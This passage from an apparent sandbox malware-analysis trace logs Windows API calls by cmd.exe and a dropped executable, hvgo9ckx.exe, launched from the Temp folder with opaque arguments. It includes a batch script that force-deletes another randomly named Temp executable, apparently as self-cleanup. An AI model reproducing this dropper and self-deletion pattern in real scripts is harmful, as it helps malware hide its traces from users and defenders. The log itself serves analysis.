lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0120.037] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2af030 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0120.037] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x2af030 | out: _Buffer=">") returned 1 [0120.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.038] GetFileType (hFile=0x7) returned 0x2 [0120.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.038] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff8 | out: lpMode=0x2aeff8) returned 1 [0120.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.038] WriteConsoleW (in: 
hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x2af024, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x2af024*=0x19) returned 1 [0120.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.038] GetFileType (hFile=0x7) returned 0x2 [0120.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.038] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af27c | out: lpMode=0x2af27c) returned 1 [0120.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.039] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2af2a8, lpReserved=0x0 | out: lpBuffer=0x42f008*, lpNumberOfCharsWritten=0x2af2a8*=0x3) returned 1 [0120.039] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2af2b4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" ") returned 58 [0120.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.039] GetFileType (hFile=0x7) returned 0x2 [0120.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af274 | out: lpMode=0x2af274) returned 1 [0120.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.039] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x2af2a0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2a0*=0x3a) returned 1 [0120.039] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af2d4 | out: _Buffer="\r\n") returned 2 [0120.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.039] GetFileType (hFile=0x7) returned 0x2 [0120.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.040] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af294 | out: lpMode=0x2af294) returned 1 [0120.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.040] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af2c0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2c0*=0x2) returned 1 [0120.040] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0120.040] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0120.040] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0120.040] GetConsoleTitleW (in: lpConsoleTitle=0x2aee44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.040] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2adebc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2adec0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2adebc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0120.041] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0120.041] _wcsicmp (_String1="bkM66bYk.exe", _String2=".") returned 52 [0120.041] _wcsicmp (_String1="bkM66bYk.exe", _String2="..") returned 52 [0120.041] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0xffffffff [0120.041] GetLastError () returned 0x2 [0120.041] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0120.041] _wcsicmp (_String1="bkM66bYk.exe", _String2=".") returned 52 [0120.041] _wcsicmp (_String1="bkM66bYk.exe", _String2="..") returned 52 [0120.041] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0xffffffff [0120.041] GetLastError () returned 0x2 [0120.041] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", fInfoLevelId=0x0, lpFindFileData=0x430554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x430554) returned 0xffffffff [0120.041] GetLastError () returned 0x2 [0120.041] _get_osfhandle (_FileHandle=2) returned 0xb [0120.041] GetFileType (hFile=0xb) returned 0x2 [0120.041] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.041] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ae8bc | out: lpMode=0x2ae8bc) returned 1 [0120.042] _get_osfhandle (_FileHandle=2) returned 0xb [0120.042] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ae8f0 | out: lpConsoleScreenBufferInfo=0x2ae8f0) returned 1 [0120.042] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0120.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.042] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.042] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.042] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.042] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.043] SetConsoleInputExeNameW () returned 0x1 [0120.043] GetConsoleOutputCP () returned 0x1b5 [0120.043] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.043] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.043] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2af27c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 
[0120.043] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.043] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.043] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.043] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af260, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af260*=0x0, lpOverlapped=0x0) returned 1 [0120.043] GetLastError () returned 0x0 [0120.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.043] GetFileType (hFile=0x54) returned 0x1 [0120.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.043] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.044] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.044] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.044] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af244*=0x0, lpOverlapped=0x0) returned 1 [0120.044] GetLastError () returned 0x0 [0120.044] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.044] GetFileType (hFile=0x54) returned 0x1 [0120.044] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.044] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.044] longjmp () [0120.044] _tell (_FileHandle=3) returned 145 [0120.044] _close (_FileHandle=3) returned 0 [0120.044] CmdBatNotification 
() returned 0x0 [0120.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.044] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.044] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.045] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.045] SetConsoleInputExeNameW () returned 0x1 [0120.045] GetConsoleOutputCP () returned 0x1b5 [0120.045] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.045] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.045] exit (_Code=0) Process: id = "48" image_name = "hvgo9ckx.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe" page_root = "0x7ea16720" os_pid = "0xdcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0xd68" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7523 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7524 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7525 start_va = 0x130000 
end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7526 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "hvgo9ckx.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe") Region: id = 7527 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7528 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7529 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7530 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7531 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7571 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7572 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7573 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 7574 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 7575 start_va 
= 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7576 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7577 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7578 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7579 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7580 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7581 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7582 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7583 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7584 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = 
"imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7585 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7586 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7587 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7588 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 7589 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 7590 start_va = 0x11f0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 7715 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7716 start_va = 0x11f0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 7717 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 7768 start_va = 0x12c0000 end_va = 0x139efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 7769 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 
7770 start_va = 0x290000 end_va = 0x292fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7771 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Thread: id = 78 os_tid = 0xdd0 [0113.431] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x818f35e0, dwHighDateTime=0x1d440a9)) [0113.431] GetCurrentProcessId () returned 0xdcc [0113.431] GetCurrentThreadId () returned 0xdd0 [0113.431] GetTickCount () returned 0x27251 [0113.431] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=17021983681) returned 1 [0113.431] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0113.431] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0113.432] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0113.432] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0113.432] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0113.432] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0113.433] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0113.433] GetCurrentThreadId () returned 0xdd0 [0113.433] 
GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x12b07d0)) [0113.433] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0113.433] GetFileType (hFile=0x3) returned 0x0 [0113.433] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.433] GetFileType (hFile=0x7) returned 0x0 [0113.433] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.433] GetFileType (hFile=0xb) returned 0x0 [0113.433] SetHandleCount (uNumber=0x20) returned 0x20 [0113.433] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0113.433] GetEnvironmentStringsW () returned 0x2cfc80* [0113.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0113.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x12b11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0113.434] FreeEnvironmentStringsW (penv=0x2cfc80) returned 1 [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] GetLastError 
() returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] GetACP () returned 0x4e4 [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] IsValidCodePage (CodePage=0x4e4) returned 1 [0113.434] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0113.434] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0113.434] GetLastError () returned 0x6 [0113.434] SetLastError (dwErrCode=0x6) [0113.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0113.434] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0113.435] GetLastError () returned 0x6 [0113.435] SetLastError (dwErrCode=0x6) [0113.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.435] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ") returned 256 [0113.435] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.435] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ炵瘥ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 